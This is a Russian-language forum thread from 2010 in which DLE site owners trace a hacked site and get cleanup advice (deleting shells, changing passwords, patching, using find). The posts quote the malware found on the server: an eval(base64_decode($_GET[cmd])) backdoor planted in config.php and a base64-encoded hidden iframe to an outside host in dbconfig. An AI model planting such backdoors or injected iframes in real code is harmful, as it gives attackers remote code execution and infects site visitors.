inspektor 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Собственно вчера обновился до ласт версии. Снес все, оставил только upload и templates - который на локальном компе почистил от файлов .glf (shell) Сегодня опять в папке енжине залит хтаксесс на запуск .glf как php и вставили вверх кода странички ифрейм. !!!проверяю антивирусом встроенным и он не показывает новые файлы неизвестные дистрибьютиву, как с этим бороться? <nofollow><noindex><div style=position:absolute;left:-900px;width:900px><iframe src=http://tonykmont.net/pics/12 width=0 height=0 style=display: none></iframe> Путем изменения шаблона сделал вывод что фрейм вставили не через темплейты. Спецом из дистрибьютива закачал дефолтный шаблон и активировал, ифрем есть - этой операцией я исключил правки файлов шаблона. Далее перезалил папку енджине и не только, ифрем на месте. Есть идеи? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Далее перезалил папку енджине и не только, ифрем на месте. Есть идеи? смотрите файлы настроек в папке engine/data/ при перезаливке дистрибутива они не обновляются. Скорее всего он там у вас шелл. Цитата Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Автор Далее перезалил папку енджине и не только, ифрем на месте. Есть идеи? смотрите файлы настроек в папке engine/data/ при перезаливке дистрибутива они не обновляются. Скорее всего он там у вас шелл. действительно, в конфиг.пвп такая фигня. 'lang_&amp;amp;amp;amp;amp;amp;amp;amp;amp;#123;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#036;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#123;@eval(base64_decode(&amp;amp;amp;amp;amp;amp;amp;amp;amp;#036;_GET[cmd]))&amp;amp;amp;amp;amp;amp;amp;amp;amp;#125;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#125;' => "", и в дбконфиг $db = new db; print base64_decode("DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQo8bm9mb2xsb3c+PG5vaW5kZXg+PGRpdiBzdHlsZT1wb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi05MDBweDt3aWR0aDo5MDBweD48aWZyYW1lIHNyYz1odHRwOi8vdG9ueWttb250Lm5ldC9waWNzLzEyIHdpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9ZGlzcGxheTogbm9uZT48L2lmcmFtZT4NCjwvZGl2Pjwvbm9mb2xsb3c+PC9ub2luZGV4Pg=="); что это такое и как с помощью этого можно залить шел? п.с Спасибо, помогло, скажите, а что это за код - да еще в конфиге который появляется первой строкой? Может у меня в папке upload еще шелы лежат, там папок очень много. как можно расшифровать код? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 inspektor, Удалять нужно все, а не расшифровкой заниматься, а изначально у вас проблема возникла потому что вовремя не установили патчи безопасности на свой сервер http://dle-news.ru/bags/Кстати теперь зайдите в админпанель и удалите всех администраторов, кроме себя, у себя смените пароль, также проверьте настройки групп, чтобы не у кого не было доступа к админпанели, кроме вашей группы, также смените пароли на MySQL Цитата Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Автор сменил все пароли, проверил права и юзеров. Единственное непонятно почему внутренний антивирь не показал лишний файл .glf Цитата Ссылка на сообщение Поделиться на других сайтах
maks1192 96 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Антивирус проверяет файлы с расширением .php Цитата Ссылка на сообщение Поделиться на других сайтах
Hydrargyrum 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Несколько дней назад тоже пришлось решить аналогичную проблему с шеллом. Прибила все лишние файлы, нового админа и поправила конфиги, а сегодня получила письмо от Яндекса: На страницах вашего сайта обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных. В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». При переходе на страницу веб-мастера у Яндекса выведен результат: Яндекс проверяет страницы сайта выборочно, поэтому список зараженных страниц может быть неполным. Пожалуйста, проверьте и другие страницы, а также элементы, общие для всех страниц. --- Дата последней проверки: 9.10.2010 Проверяю сайт на вирусы на сервере "бурбона"... результат неутешительный: На странице http://www..... возможно есть вредоносный код! Патчи безопасности все установлены! Help me, please! Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Help me, please! начните с чистки своего компа. потом менять пароли на фтп, базу, удалить все кроме картинок, перезалить файлы скрипта из дистрибутива и в конце концов почитать форум, миллион раз писали. Цитата Ссылка на сообщение Поделиться на других сайтах
Hydrargyrum 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Help me, please! начните с чистки своего компа. потом менять пароли на фтп, базу, удалить все кроме картинок, перезалить файлы скрипта из дистрибутива и в конце концов почитать форум, миллион раз писали. Все это произведено и не раз! И пароли поменяла и файлы на ФТП. Комп без вирусов. И? Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Все это произведено и не раз! значит плохо произведено. вы поймите простую вещь, если бы дело было в дле, щас бы тысячи админов выли волками. И пароли поменяла и файлы на ФТП. Комп без вирусов. И? ага, старые песни о главном ну, не можете сами разобраться, наймите нормального админа. Цитата Ссылка на сообщение Поделиться на других сайтах
Hydrargyrum 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Слушайте, prikindel! Если Вам говорят, что все пароли изменены (файлы залиты из дистрибутива) сразу же после обнаружения "левых" файлов и админа, это не значит, что только на словах! Не считайте себя самым умным, Вы наш "сильно нормальный"! Цитата Ссылка на сообщение Поделиться на других сайтах
Sokolov 0 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 значит плохо произведено. вы поймите простую вещь, если бы дело было в дле, щас бы тысячи админов выли волками. Да они собственно и воют, только дело не в DLE, а как мне кажется в phpMyAdmin, через него и заливали коды прям в базу. Не зря же хостеры несколько недель назад ринулись его обновлять. Hydrargyrum, попробуйте скачать базу, а затем поиском и заменой вычистить код. Он скорее всего у Вас, как и у остальных пострадавших, записан в таблице с полной новостью. Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Не считайте себя самым умным, Вы наш "сильно нормальный"! выпейте валерьянки, дышите глубже и самое главное, включите логику. phpMyAdmin для пхпмайадмина все равно нужен доступ к базе. с другой стороны, если есть доступ к базе, то майадмин вообще не нужен. а обновления - их, по-любому, надо делать всегда своевременно, это ж аксиома. кстати, ты про какой именно баг писал, я пока нашел про dd_ssh, или есть еще какие то? буду признателен. поиском и заменой вычистить код об этом уже писалось, но леди предпочитает не читать форум. Цитата Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 (изменено) Автор вообщем сегодня опять залили .hlf я уже незнаю что делать. помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пвп файла. вообщем сегодня опять залили .hlf я уже незнаю что делать. помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пхп файла. Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf? Изменено 10 октября 2010 пользователем inspektor Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 для пхпмайадмина все равно нужен доступ к базе. с другой стороны, если есть доступ к базе, то майадмин вообще не нужен. Вы ошибаетесь в сфере недавно найденной уязвимости для MyPHPAdmin там не нужен никакой доступ, можно было легко получать доступ над всем сервером, в том числе и заливать шеллы, при этом не нужно было иметь никаких доступов.вообщем сегодня опять залили .hlf я уже незнаю что делать. помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пвп файла. отправляйте запрос в службу поддержки http://dle-news.ru/index.php?do=feedback предоставляйте доступ к админпанели, и по FTP чтобы проверили ваш сервер и что у вас там стоит. Внимание при проверке будут удалены все сторонние модули и PHP файлы с вашего сервера не имеющие отношения к стандартному скрипту DLEСегодня опять в папке енжине залит хтаксесс на запуск .glf как php и вставили вверх кода странички ифрейм. кстати на эту папку не должно быть никаких прав на запись, значит залит файл либо через FTP или при помощи уязвимого ПО сервера, либо у вас в нарушения всех инструкций по непонятным причинам на папку стоят права на запись Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 в сфере недавно найденной уязвимости неплохо поэтому выше и поинтересовался, dd_ssh или какая то другая ? их там просто достаточно много существует менее или более опасных если в курсе, подскажите название или трэкинг номер какой то Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf? find / -name "*glf" Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 поэтому выше и поинтересовался, dd_ssh или какая то другая ? нет, обыкновенная XSS, но очень серьезная, шелы заливаться очень легко и без каких либо доступов, их описания есть на странице http://www.phpmyadmin.net/home_page/security/ Цитата Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Автор Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf? find / -name "*glf" спс. Подскажи как сделать поиск только в нужной папке а то начинает шерстить весь сервер и результаты уходят вверх - аж невидно.) Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 find /folder1/folder2/ -name "*glf" Будет искать в папке folder2, а если хочешь видеть по чуть-чуть, то пиши так: find /folder1/folder2/ -name "*glf"|more и когда будешь нажимать "Enter", то будет показывать по чуть-чуть Или же можешь всё найденное сохранить в файл: find /folder1/folder2/ -name "*glf" > /folder1/folder2/123.txt В в файле 123.txt будет всё, что нашло. Цитата Ссылка на сообщение Поделиться на других сайтах
Hydrargyrum 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 об этом уже писалось, но леди предпочитает не читать форум. Леди, да будет тебе известно, малыш, нашла и удалила лишний код еще до обращения с вопросом на форум. === По-поводу моей просьбы о помощи.. Извиняюсь, народ, ложное срабатывание.. Яндекс, оказывается, запоздалую статистику выслал.. Вчера запросила новую проверку, сегодня пришло сообщение: Последняя перепроверка сайта не выявила страниц, содержащих вредоносный код. Рано я запаниковала.. Думала, может в базе что-то или в каком-нить файле скрыто (мной пропущено).. По дате был изменен только один файл - dbconfig. Остальные тогда проверила на всякий случай, для успокоения.. Лишний файл (GLF) в папке upload прибила сразу при обнаружении.. В других директориях подобного не обнаружилось.. .htaccess-ы соответствовали оригиналам.. т.е. исправлены не были.. Цитата Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Автор вот спасибо. удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf. 2.celsoft обнаружил еще .glf в папках других сайтов - которые не на дле, прибил, дальше буду смотреть. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 (изменено) удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf. Сюда могут попадать и файлы и именами: abcglf По этому Вам надо делать такой запрос: find / -name "*.glf" > 1.txt Изменено 10 октября 2010 пользователем WWW.ZEOS.IN Цитата Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 11 октября 2010 Рассказать Опубликовано: 11 октября 2010 (изменено) Автор удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf. Сюда могут попадать и файлы и именами: abcglf По этому Вам надо делать такой запрос: find / -name "*.glf" > 1.txt большое человеческое спасибо. Проблема вроде решена, поудалял на всем сервере все глфки, полет пока нормальный. Изменено 11 октября 2010 пользователем inspektor Цитата Ссылка на сообщение Поделиться на других сайтах
biggamehunter 0 Опубликовано: 17 октября 2010 Рассказать Опубликовано: 17 октября 2010 (изменено) Столкнулся по-полной с описанной проблемой ... Вроде вычистил. Только заплатка предлагается с 7.**-й версии, а у меня 6.7 и ниже стоят, нет каких-то способов пофиксить проблему от самопровозглашённых "админов"? http://bestsafari.org Изменено 17 октября 2010 пользователем biggamehunter Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.